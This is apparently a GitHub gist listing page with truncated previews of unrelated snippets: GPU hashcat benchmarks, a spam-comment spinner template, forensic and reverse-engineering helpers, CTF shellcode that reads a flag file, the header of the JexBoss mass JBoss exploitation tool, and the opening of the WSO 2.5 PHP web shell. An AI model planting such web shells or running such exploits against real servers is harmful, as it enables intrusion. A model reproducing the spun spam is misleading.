Skip to content

Instantly share code, notes, and snippets.

@epixoip
epixoip / TitanX.md
Last active December 23, 2016 10:56
World's First Nvidia GTX Titan X cudaHashcat Benchmarks

Nvidia GTX Titan X cudaHashcat Benchmarks

Product: Sagitta Inceptus (PN S1430X-GTX-TITANX) (my dev box)

Software: cudaHashcat 1.36b31, ForceWare 346.35

Accelerator: 1x Nvidia GTX Titan X reference design

Observations

@eatonphil
eatonphil / gist:7d57257f65673b343441
Created May 5, 2015 11:47
Bot Dumps Beautiful Uncompiled Spam On My Blog
{
{I have|I’ve} been {surfing|browsing} online more than {three|3|2|4} hours today, yet
I never found any interesting article like yours. {It’s|It is}
pretty worth enough for me. {In my opinion|Personally|In my view},
if all {webmasters|site owners|website owners|web owners} and bloggers made good content as you did, the {internet|net|web} will be {much more|a lot more} useful than ever before.|
I {couldn’t|could not} {resist|refrain from} commenting.
{Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I’ll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch} your {rss|rss feed} as I {can not|can’t} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service.
Do {you have|you’ve} any? {Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may
just|may|could} subscribe. Thanks.|
@0xdabbad00
0xdabbad00 / IceBuddha_USN_parser
Created May 11, 2015 22:18
USN Parser for IceBuddha
""" USN file parse script for IceBuddha.com, based on http://shark5terforensics.blogspot.com/2015/03/manually-parsing-unallocated-usn.html
"""
import icebuddha
__author__ = "0xdabbad00"
__license__ = "Apache"
class Parse:
def run(self, data):
filedata = data
#!/usr/bin/env python
import socket
# b8 03 00 00 00 mov $0x3,%eax # syscall 3 (read)
# bb 03 00 00 00 mov $0x3,%ebx # from fd 3 (flag file)
# 89 e1 mov %esp,%ecx # to stack
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
# cd 80 int $0x80 # perform syscall
# b8 02 00 00 00 mov $0x2,%eax # syscall 2 (write)
# bb 01 00 00 00 mov $0x1,%ebx # to fd 1 (stdout)
@googleinurl
googleinurl / JexBoss.py
Created June 19, 2015 03:32
JexBoss - Jboss Verify Tool - (MASS) / SCRIPT Edited by: GoogleINURL
#coding: utf-8
'''
--------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] SCRIPT original: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
--------------------------------------------------------------------------------------
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
@1N3
1N3 / wso_2.5_shell.php
Last active May 21, 2024 00:21
WSO 2.5 Shell
<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;
@MichaelPote
MichaelPote / himawari.ps1
Created February 3, 2016 19:11
Windows Powershell Script to download the latest image from the Himawari-8 satelite, combine the tiles into a single image, convert to jpg and then set as the desktop background.
#
# Himawari-8 Downloader
#
#
#
# This script will scrape the latest image from the Himawari-8 satellite, recombining the tiled image,
# converting it to a JPG which is saved in My Pictures\Himawari\ and then set as the desktop background.
#
# http://himawari8.nict.go.jp/himawari8-image.htm
#
@herrcore
herrcore / quick_ioctl_decoder.py
Created August 14, 2016 02:53
IDA Python plugin - Decode IOCTL Codes
############################################################################################
##
## Quick IOCTL Decoder!
##
## All credit for actual IOCTL decode logic:
## http://www.osronline.com/article.cfm?article=229
##
##
## To install:
## Copy script into plugins directory, i.e: C:\Program Files\IDA 6.8\plugins
anonymous
anonymous / psx.py
Created November 13, 2016 14:32
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
@83leej
83leej / check
Created November 27, 2016 14:18
just a simple script that grabs two file if they are currently not there, allows checking for IP ranges by providing a simple name such as 'godaddy' or 'digitalocean', it then returns the results and provides a file name rangelist with the found ranges.
#!/bin/bash
NAMETOCHECK=$1
if [ ! -d asninfo ]; then
mkdir asninfo;
echo "Created: asninfo/";
fi
if [ ! -f asninfo/data-used-autnums.txt ]; then